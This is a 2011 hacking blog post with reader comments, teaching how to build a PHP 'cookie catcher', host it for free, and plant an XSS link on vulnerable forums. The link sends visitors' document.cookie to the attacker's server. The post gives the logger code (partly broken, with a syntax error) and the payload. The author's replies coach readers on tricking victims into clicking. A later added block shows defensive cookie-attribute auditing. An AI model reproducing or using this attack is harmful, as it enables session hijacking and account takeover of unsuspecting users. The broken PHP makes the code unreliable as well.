Saturday, November 19, 2011

What is Cookie Catcher and How to Get Cookies Using it


Hello guys, I hope you are all enjoying good health. The day before yesterday I completed my tutorial on XSS, which covered Hack Websites using XSS Attack and then Hack Website using XSS Attack - Non Persistent Method. In those tutorials I said that we have to use a cookie catcher tool to get the cookies in our free online PHP hosting account. After that I got a lot of questions about the cookie catcher, such as what it is.
So today I am going to discuss what this cookie catcher tool is and some basic concepts related to it. I hope you guys like it, and if you have any problem with it, do let me know in the comments.

What is a Cookie?

  • First of all, let us see what a cookie is. In simple words, a cookie is a special thing which our web browser uses to store our information, such as usernames, passwords, etc.
  • Have you ever noticed that when we log in to an account like Facebook and open any page in a new tab, we don't have to enter our username and password again? Even if we close Facebook and open it again, there is still no need to enter our details again unless we have logged out of the account.
  • This is done by the browser's cookie. It exists for our ease, but think what happens if this cookie gets stolen: someone can then easily log in to our account without even knowing the password.

What is a cookie catcher?

  • A cookie catcher tool is nothing but a PHP script which captures our browser's cookies.
  • A hacker usually sends you a code or link, and this link is connected to the cookie catcher.
  • When someone clicks on that link, the cookie catcher runs, captures all the cookies of the innocent victim and sends them to the hacker.

Is making a cookie catcher hard?

  • Now the question arises: is it difficult to make a cookie catcher, as it looks like we have to do some PHP programming?
  • The answer is no. If you have basic knowledge of PHP, you can make a cookie catcher very easily.
  • In fact, the hard part is to get someone to click on a link which contains your cookie catcher.

How to Make a Cookie Catcher?

  • Copy the code below into Notepad:
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>
  • Save this file as CookieCatcher.php
  • Hurrah! You have created a cookie catcher.

How to Use Cookie Catcher?

  • Now the question arises of how we can use a cookie catcher.
  • First of all, create a free account on 0fees.net
  • After creating the account, open cpanel.0fees.net and log in to your account.
  • Now, under File Management, click on Online File Manager.
  • Now open htdocs and upload the CookieCatcher.php file to it.
  • Now upload the code below to any site which is vulnerable to XSS, for example by making a post in some forum.
<a onclick="document.location='http://YOUR-USER-NAME.0fees.net/cookiecatcher.php?cookie='+escape(document.cookie);" href="#"> click here </a>
  • Make sure to change the username.
  • After posting, this will appear like a link, and when someone clicks on that link, the cookie catcher automatically creates a file named Cookies.html in the same folder in your account, and the cookies of the person who clicked will be written to that file.
NOTE: This tutorial is only for educational purposes and the HWS team is not responsible for any kind of misuse of it.
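
Seen from the defending site's side, the link above only leaks what `document.cookie` exposes, and a cookie set with the HttpOnly attribute is never exposed there. The following is an added example, not code from the original post: it audits Set-Cookie headers and models which cookies page script could read; the cookie names and values are constructed for illustration.

```javascript
// Added example: audit Set-Cookie headers for script-readable cookies.
// All cookie names and values below are constructed sample data.

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  const eq = pair.indexOf('=');
  if (eq === -1) return { name: '', value: pair, attrs }; // nameless cookie
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Model of document.cookie: HttpOnly cookies are hidden from script.
function scriptVisibleCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Report which hardening attributes each cookie is missing.
function auditCookies(headers) {
  return headers.map(parseSetCookie).map((c) => {
    const missing = [];
    if (!c.attrs.httponly) missing.push('HttpOnly');
    if (!c.attrs.secure) missing.push('Secure');
    if (!c.attrs.samesite) missing.push('SameSite');
    return { name: c.name, missing };
  });
}

// Constructed headers: a weak configuration beside a hardened one.
const weak = ['PHPSESSID=abc123; Path=/', 'theme=dark; Path=/'];
const hardened = [
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; Secure; SameSite=Lax',
];

console.log('weak, visible to script:    ', scriptVisibleCookies(weak));
console.log('hardened, visible to script:', scriptVisibleCookies(hardened));
console.log(JSON.stringify(auditCookies(weak)));
```

HttpOnly only keeps the session identifier out of injected script's reach; the forum still has to HTML-encode user posts so that the `onclick` handler is never rendered as markup.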

About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I have been blogging since 2009; before that I just searched for things, and now I am sharing my knowledge through this platform. I'm also a freelance writer on topics related to Website Hacking, Website Optimization (SEO), blogger customizations and making money online.

13 comments:

I'm a blogger and I can get people to click it. But of course, I'm not doing that because I'm not a hacker. I'll use this knowledge to protect myself. Most victims of this cookie catcher are non-tech-savvy guys. Thanks for the great post. I hope this tutorial will not get into the wrong hands.

@Edward .... ya man, I have already mentioned that this tutorial is only for educational purposes so that other bloggers remain aware of such tricks .... as they seriously may cause you to lose your blog ....

"Now upload the below code in any site which is vulnerable to XSS like make a post in some forum." I didn't understand this step, can you please explain more?

first find some XSS vulnerable forum which allows you to post php ..... and in that forum create a new thread and post this code there .... it appears like a link and whoever clicks on it ..... got trapped

Check this topic on XSS ===> http://www.hackwithstyle.com/2011/11/hack-websites-using-xss-attack.html

Didn't understand this step :(
Is it compulsory?
Now upload the below code in any site which is vulnerable to XSS like make a post in some forum.

What if we didn't do this step and just send the following link to the victim?

Will it work or not when the victim clicks?
Reply with a full message please

yups the clicking is just to enter the link of the cookie catcher in the url ..... so if you can compel the victim to enter the link in the url bar then it's fine ..... both work in the same way ....

So that code you gave us won't really get us a person's cookie file? Or will it give us their cookie file? Or is it just to show us how it's done as an example?
